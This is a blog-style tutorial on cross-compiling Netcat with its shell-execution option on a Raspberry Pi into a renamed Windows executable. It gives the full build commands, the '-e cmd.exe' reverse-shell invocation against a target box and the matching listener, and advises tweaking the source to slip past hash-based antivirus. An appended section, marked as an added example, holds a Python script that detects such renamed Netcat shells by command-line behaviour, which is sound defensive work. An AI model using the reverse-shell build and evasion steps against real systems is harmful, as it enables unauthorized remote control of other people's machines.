It has been a crazy few weeks, so this post is going to be brief. If you have any questions, feel free to hit me up on Twitter. You may also find this post, which details how to compile Netcat on Windows 10 to run on Windows 10, informative.
The environment I used to build this doc is as follows:
Raspberry Pi 3 running Raspbian GNU/Linux (version 9 stretch)
MinGW-w64 (version 5.0.1-1 as of 10/17); this can easily be installed with: sudo apt-get install mingw-w64
Netcat, to listen for the reverse shell: sudo apt-get install netcat
The Netcat C source code, which can be obtained here.
I tested this on a Windows 10 box with the most current updates as of 10/17/2017. Since this box is the target, nothing fancy is needed: just a standard Windows 10 box.
Open a terminal (or SSH in) and navigate to the folder holding the source code, then run:
pi@blah:$ i686-w64-mingw32-gcc -c -O3 -march=i686 -DWIN32 -DNDEBUG -D_CONSOLE -DTELNET -DGAPING_SECURITY_HOLE getopt.c
pi@blah:$ i686-w64-mingw32-gcc -c -O3 -march=i686 -DWIN32 -DNDEBUG -D_CONSOLE -DTELNET -DGAPING_SECURITY_HOLE doexec.c
pi@blah:$ i686-w64-mingw32-gcc -c -O3 -march=i686 -DWIN32 -DNDEBUG -D_CONSOLE -DTELNET -DGAPING_SECURITY_HOLE netcat.c
pi@blah:$ sudo i686-w64-mingw32-gcc getopt.o netcat.o doexec.o -o iRunOnWindows.exe -O3 -march=i686 -Wl,-lkernel32,-luser32,-lwinmm,-lws2_32
pi@blah:$ sudo /usr/i686-w64-mingw32/bin/strip iRunOnWindows.exe
The sudo on the last two commands is probably not needed on a fresh Raspbian; I am running other tests and doing other things on this Pi, so permissions-wise it was needed in my case. I am merely sharing exactly how I got this running. Feel free to experiment. Anyhow.
Transfer the iRunOnWindows.exe file to your Windows box.
Open CMD and run: c:\..path to exe…\iRunOnWindows.exe <control box IP> <port> -e cmd.exe
example: c:\Users\user\Downloads\iRunOnWindows.exe 220.127.116.11 2222 -e cmd.exe
On your control box run: nc -lp <port>
example: nc -lp 2222
This basic outline demonstrates how it is possible to develop and build Windows binary executables on Linux. This has many convenient uses. First, compiling a payload yourself gives you a lot of control: your target Windows box may not have compilers available, but that detail should not really matter. Furthermore, by making small tweaks to the source code you can likely bypass (at least initially) security software that relies on file hashes to flag files as malicious. By compiling borrowed code yourself you reduce the chance that a common program (like NC) will be immediately detected.
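As an added example (not from the original post) of the defender's side of that last point: a small triage script over constructed, Sysmon-style process-creation records shows that a hash denylist only catches the stock nc.exe build, while a rule keyed on Netcat's `-e <shell>` plus a port argument (the GAPING_SECURITY_HOLE behaviour used above) still flags the recompiled and renamed iRunOnWindows.exe. All hashes, paths and the 192.0.2.10 address are made up for this example.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified to
# "key=value|key=value"); hashes, paths and the address are invented for this example.
SAMPLE_EVENTS = [
    "Image=C:\\Tools\\nc.exe|CommandLine=nc.exe 192.0.2.10 2222 -e cmd.exe|SHA256=aaaa1111",
    "Image=C:\\Users\\user\\Downloads\\iRunOnWindows.exe|CommandLine=iRunOnWindows.exe 192.0.2.10 2222 -e cmd.exe|SHA256=bbbb2222",
    "Image=C:\\Users\\user\\Downloads\\iRunOnWindows.exe|CommandLine=iRunOnWindows.exe -lp 4444 -e powershell.exe|SHA256=bbbb2222",
    "Image=C:\\Windows\\System32\\ping.exe|CommandLine=ping.exe 192.0.2.10|SHA256=cccc3333",
]

# Placeholder denylist holding only the hash of the stock nc.exe build (constructed value).
KNOWN_BAD_SHA256 = {"aaaa1111"}

# Netcat's -e <program> option (compiled in via GAPING_SECURITY_HOLE) handing out a shell.
SHELL_EXEC = re.compile(r"(?:^|\s)-e\s+(?:cmd|powershell)(?:\.exe)?(?:\s|$)", re.I)
# A bare 1-5 digit token: the port in "host port" (connect) or "-lp port" (listen) form.
PORT_TOKEN = re.compile(r"(?:^|\s)\d{1,5}(?:\s|$)")


def parse_event(line):
    """Split one 'key=value|key=value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def hash_match(event):
    """Hash rule: fires only on a binary whose exact hash is already on the denylist."""
    return event["SHA256"].lower() in KNOWN_BAD_SHA256


def behavior_match(event):
    """Behaviour rule: '-e <shell>' plus a port argument, regardless of image name or hash."""
    cmd = event["CommandLine"]
    return bool(SHELL_EXEC.search(cmd)) and bool(PORT_TOKEN.search(cmd))


def triage(lines):
    """Return (image, rule) pairs for every event that trips either rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if hash_match(ev):
            hits.append((ev["Image"], "hash"))
        if behavior_match(ev):
            hits.append((ev["Image"], "behavior"))
    return hits


if __name__ == "__main__":
    for image, rule in triage(SAMPLE_EVENTS):
        print(f"{rule:8} {image}")
```

Only the first record is caught by the hash rule; the two renamed-binary records are caught solely by the command-line rule, and the ping.exe record stays clean.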